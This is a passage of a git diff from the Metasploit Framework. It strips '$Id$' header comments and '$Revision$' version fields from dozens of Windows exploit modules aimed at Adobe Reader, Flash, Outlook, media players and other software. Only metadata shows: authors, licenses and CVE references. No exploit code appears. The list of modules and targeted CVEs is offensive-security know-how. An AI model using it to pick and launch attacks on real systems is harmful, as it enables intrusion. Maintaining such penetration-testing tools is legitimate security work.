a/modules/exploits/windows/driver/netgear_wg111_beacon.rb b/modules/exploits/windows/driver/netgear_wg111_beacon.rb index 12ee5cd52a..b533aa4eae 100644 --- a/modules/exploits/windows/driver/netgear_wg111_beacon.rb +++ b/modules/exploits/windows/driver/netgear_wg111_beacon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -49,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5972'], diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 03f0838979..8d9e0f68bf 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'hdm', # First version 'skape', # Vista support ], - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS07-017'], diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 3207600ac7..f6b0e920c7 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote command line options. }, 'Author' => 'Yorick Koster ', - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS10-045'], diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index e999b8060f..820b965b72 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote command line options. }, 'Author' => 'Yorick Koster ', - 'Version' => '$Revision$', 'References' => [ ['MSB', 'MS10-045'], diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index c372ae059f..2f75b196a4 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2158' ], diff --git a/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb index 61e3fc58d2..1870fcd47c 100644 --- a/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a-pdf_wav_to_mp3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Dr_IDE', # SEH Exploit 'dookie' # MSF Module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '67241' ], diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index bd3b94f0d4..61f2d80f17 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Parvez Anwar', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-2595' ], diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index fd007b38a0..d3e2ed382f 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => 'MC', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2193' ], diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index c5891dbe36..45e837d208 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '64579'], diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index a980661445..34b1c70653 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-5659' ], diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 2d46f3f602..a8ba842b7e 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote '@vicheck', # initial analysis 'jduck' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-2883' ], diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index f8a2e3ff88..b05399bf87 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -40,7 +36,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Haifei Li', # PoC 'jduck' # Metasploit version ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-3654'], diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index 40eb032384..888ca01a96 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Unknown', # Found being openly exploited 'jduck' # Metasploit version ], - 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-1297'], diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index 5cefb03e8b..6e9edb3247 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit version by: 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3459' ], diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index e29479c3d5..ca79fcd9be 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Didier Stevens ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0927' ], diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index bea45f5925..7ac0ee598c 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Nine:Situations:Group::pyrokinesis', 'dookie' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4195' ], diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index e809b3645c..596a71f3f5 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote # obfuscation techniques and pdf template from util_printf 'MC', 'Didier Stevens ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2009-0658' ], diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 4c99f06168..d2f64182ca 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote # Metasploit version by: 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-0188' ], diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 89d1ba679f..3ce77c39ef 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'pusscat', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4324' ], diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index a9fecc52a8..0af3d0701a 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Colin Ames ', # initial module 'jduck' # add Documents for vista/win7 ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1240' ], diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index 2b2731152d..01deda83dd 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Jeremy Conway ', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1240' ], diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index 7f2991aca8..c4c3d7d7ca 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Felipe Andres Manzano ', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3953' ], diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 1b6c2a65c5..47c0519311 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC', 'Didier Stevens ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-2992' ], diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index 467f250e62..554470b5cf 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'patrick' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-3314' ], diff --git a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb index c2c4a47827..9dfe139221 100644 --- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb +++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote results arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sup3r', #Initial disclosure, poc (9.5) diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index ac2b6874ae..d25a283f2e 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -55,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Trancer ' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '61964'], diff --git a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb index e468f92450..9ac8e2435e 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote 'MC', # Original Metasploit Module 'corelanc0d3r ', # Added DEP Bypass support ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-0257' ], diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index 3dcb4b4b25..dadaab71fd 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -28,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'germaya_x', 'dookie', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0476' ], diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index 4117c613e3..eca075b44d 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -33,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Sebastien Duquette', 'dookie', ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0476'], diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index 93239bdab6..d8cfd14680 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Brown', 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68096'], diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 140e718cb1..349256f801 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE' , '2006-6199' ], diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index e9732cffea..d53b6c425c 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-2864' ], diff --git a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb index 57da50d708..1f31b9fc8a 100644 --- a/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb +++ b/modules/exploits/windows/fileformat/cain_abel_4918_rdp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5405' ], diff --git a/modules/exploits/windows/fileformat/csound_getnum_bof.rb b/modules/exploits/windows/fileformat/csound_getnum_bof.rb index 11390576f6..4a14c0fb5c 100644 --- a/modules/exploits/windows/fileformat/csound_getnum_bof.rb +++ b/modules/exploits/windows/fileformat/csound_getnum_bof.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Secunia', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2012-0270' ], diff --git a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb index 1e7b22bdfa..d76a4955da 100644 --- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb +++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,9 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Luigi Auriemma', # Initial Discovery/PoC - 'James Fitts' # Metasploit Module (Thx Juan & Jeff) + 'James Fitts ' # Metasploit Module (Thx Juan & Jeff) ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '75991' ], diff --git a/modules/exploits/windows/fileformat/deepburner_path.rb b/modules/exploits/windows/fileformat/deepburner_path.rb index c1b15fc9ce..91b9a591b7 100644 --- a/modules/exploits/windows/fileformat/deepburner_path.rb +++ b/modules/exploits/windows/fileformat/deepburner_path.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'fl0 fl0w', # re-discovered 2009/2010 'jduck' # metasploit version ], - 'Version' => '$Revision$', 'References' => [ [ 'BID', '21657' ], diff --git a/modules/exploits/windows/fileformat/destinymediaplayer16.rb b/modules/exploits/windows/fileformat/destinymediaplayer16.rb index 537a2ddca5..da45606895 100644 --- a/modules/exploits/windows/fileformat/destinymediaplayer16.rb +++ b/modules/exploits/windows/fileformat/destinymediaplayer16.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancek ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3429' ], diff --git a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb index f3c37bc3c5..ef60960341 100644 --- a/modules/exploits/windows/fileformat/digital_music_pad_pls.rb +++ b/modules/exploits/windows/fileformat/digital_music_pad_pls.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Abhishek Lyall ' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '68178' ], diff --git a/modules/exploits/windows/fileformat/djvu_imageurl.rb b/modules/exploits/windows/fileformat/djvu_imageurl.rb index 59ce4d9aed..cfdf5a1d77 100644 --- a/modules/exploits/windows/fileformat/djvu_imageurl.rb +++ b/modules/exploits/windows/fileformat/djvu_imageurl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'dean ' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4922' ], diff --git a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb index 4dadf43f02..6e919aa73e 100644 --- a/modules/exploits/windows/fileformat/dvdx_plf_bof.rb +++ b/modules/exploits/windows/fileformat/dvdx_plf_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote Windows XP SP2/SP3, Windows Vista, and Windows 7. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'n00b', #Initial discovery, poc for 4.1 diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 33204d3635..be3d67f758 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '58423'], diff --git a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb index 747e98ed71..55b8a624fc 100644 --- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb +++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -34,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote 'TecR0c ', # msf 'mr_me ', # msf ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3494' ], diff --git a/modules/exploits/windows/fileformat/etrust_pestscan.rb b/modules/exploits/windows/fileformat/etrust_pestscan.rb index c64f436420..c65ed5d322 100644 --- a/modules/exploits/windows/fileformat/etrust_pestscan.rb +++ b/modules/exploits/windows/fileformat/etrust_pestscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'License' => MSF_LICENSE, 'Author' => [ 'MC' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4225' ], diff --git a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb index 75fae5d2c7..26bf67ace8 100644 --- a/modules/exploits/windows/fileformat/ezip_wizard_bof.rb +++ b/modules/exploits/windows/fileformat/ezip_wizard_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -39,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck', #Metasploit 'Lincoln', #Complete Metasploit port ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-1028' ], diff --git a/modules/exploits/windows/fileformat/fatplayer_wav.rb b/modules/exploits/windows/fileformat/fatplayer_wav.rb index 26db985da8..7e12557da4 100644 --- a/modules/exploits/windows/fileformat/fatplayer_wav.rb +++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb @@ -1,8 +1,4 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,10 +25,9 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'James Fitts', # Original Exploit + 'James Fitts ', # Original Exploit 'dookie', # Metasploit Module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4962'], diff --git a/modules/exploits/windows/fileformat/fdm_torrent.rb b/modules/exploits/windows/fileformat/fdm_torrent.rb index 1f3303934b..73f15b7e87 100644 --- a/modules/exploits/windows/fileformat/fdm_torrent.rb +++ b/modules/exploits/windows/fileformat/fdm_torrent.rb @@ -1,7 +1,3 @@ -## -# 